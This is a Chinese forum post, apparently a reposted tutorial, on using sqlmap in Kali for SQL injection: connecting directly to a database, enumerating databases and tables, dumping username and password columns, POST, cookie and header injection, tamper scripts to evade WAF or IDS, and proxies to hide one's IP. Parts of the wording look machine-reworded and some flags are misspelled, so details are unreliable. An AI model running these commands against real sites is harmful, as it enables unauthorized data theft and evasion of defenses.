惊落一身雪 发表于 2024-7-31 13:40:34

sqlmap确定目标/实操

安装kali,kali自带sqlmap,在window系统中跟linux系统操作有区别
   sqlmap是一款主动化SQL工具,打开kali终端,输入sqlmap,出现以下界面,就阐明sqlmap可用。
   https://i-blog.csdnimg.cn/direct/b2f6a5d6864f4e4595e276295179b71f.png
   sqlmap确定目标

   一、sqlmap直连数据库

   1、直连数据库得到旗标
   sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner
   阐明:
   

[*]-d 或 --ds 参数用于指定命据库的毗连字符串。
[*]mysql://:指定了数据库的范例是MySQL。
[*]root:123456:这是数据库的用户名和密码,分别是root和123456。
[*]@192.168.137.111:指定了数据库的服务器IP地点,这里是192.168.137.111。
[*]:3306:指定了数据库服务器的端标语,MySQL的默认端口是3306。
[*]/dbb7:指定了要毗连的数据库名称,这里是dbb7。
[*]--banner:这个选项指示sqlmap实验检索并显示数据库的版本信息(即“banner”)。这对于了解目标数据库的范例和版本非常有效,由于差别的数据库范例和版本可能有差别的漏洞和弱点。
   2、直连数据库获取用户及权限
   sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner -users
   二、sqlmap实操

   1、sqlmap完整的get注入

           sqlmap直接对单一的url探测,参数使用-u大概--url
   

[*]1、检测注入点
           sqlmap -u 'http://xx/?id=1'
   

[*]2、查看所有数据库
           sqlmap -u 'http://xx/?id=1' --dbs --batch
   

[*]3、查看当前使用的数据库
           sqlmap -u 'http://xx/?id=1' --current -db --batch
   

[*]4、查看表名
           sqlmap -u 'http://xx/?id=1' -D 'security' --tables --batch
   

[*]5、查看字段
           sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns --batch
   

[*]6、查看数据
           sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump --batch
   

[*]7、查看字段值
           sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username,password' --dump --batch
   2、参数阐明

   指定命据库/表/字段
   

[*]-D 指定目标「数据库」,单/双引号包裹,常配合其他参数使用。
[*]-T 指定目标「表」,单/双引号包裹,常配合其他参数使用。
[*]-C 指定目标「字段」,单/双引号包裹,常配合其他参数使用。
   如:sqlmap -u 'http://xx/?id=1'  -D  'security'  -T  'users'  -C  'username' --dump
   2、post哀求

   sqlmap探测post盲注
   步调一:获取http哀求天生test.txt文件
   步调二:使用基于时间技术的sqlmap探测-r
   如:sqlmap -r test.txt --technique T -p uname
   检测post哀求的注入点,使用BP等工具抓包,将http哀求内容保存到txt文件中。
   -r 指定需要检测的文件,SQLmap会通过post哀求方式检测目标。
   如:sqlmap -r test.txt
   3、cookie注入

   --cookie 指定cookie的值,单/双引号包裹。
   如:sqlmap -u "http://xx?id=x" --cookie 'cookie'
   4、sqlmap举行http头注入

   指定注入位置举行注入,在保存的文件中,对于参数的修改为*,保存在txt文档中
   再举行sqlmap -r /root/test.txt
   5、sqlmap tamper脚本注入

   --tamper 指定绕过脚本,绕过WAF或ids等。
   sqlmap内置了很多绕过脚本,在 /usr/share/sqlmap/tamper/ 目录下
   如:sqlmap -u 'http://xx/?id=1' --tamper 'uppercase.py'
   三、sqlmap其他参数

   (1)常见参数

   

[*]--method=GET 指定哀求方式(GET/POST)
[*]--random-agent 随机切换UA(User-Agent)
[*]--user-agent '  ' 使用自定义的UA(User-Agent)
[*]--referer '  ' 使用自定义的 referer
[*]--threads 10 设置线程数,最高10
   (2)性能优化参数

   

[*]--keep-alive 设置长期毗连,加快探测速率
[*]--null-connection 检索没有body响应的内容,多用于注
[*]--thread 最大为10 设置多线程
[*]-o开启所有默认性能优化
[*]-smart 快速判断,节约时间
[*]设置延迟 --delay 时间。当页面无变化,布尔无真假,从来不报错时用延时注入
[*]设置超时 --timeout 时间
[*]设置重新毗连次数--retries 次数
   (3)等级参数

   

[*]--batch 主动选择yes。
[*]--level=1 执行测试的等级(1-5,默认为1,常用3)
[*]--risk=1 风险级别(0~3,默认1,常用1),级别进步会增加数据被窜改的风险。
   (4)署理参数

   潜伏自己的真实ip
   

[*]--proxy http://ip: 端口
[*]--proxy -file 使用一个包含多条署理的文件中的署理
   
   

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: sqlmap确定目标/实操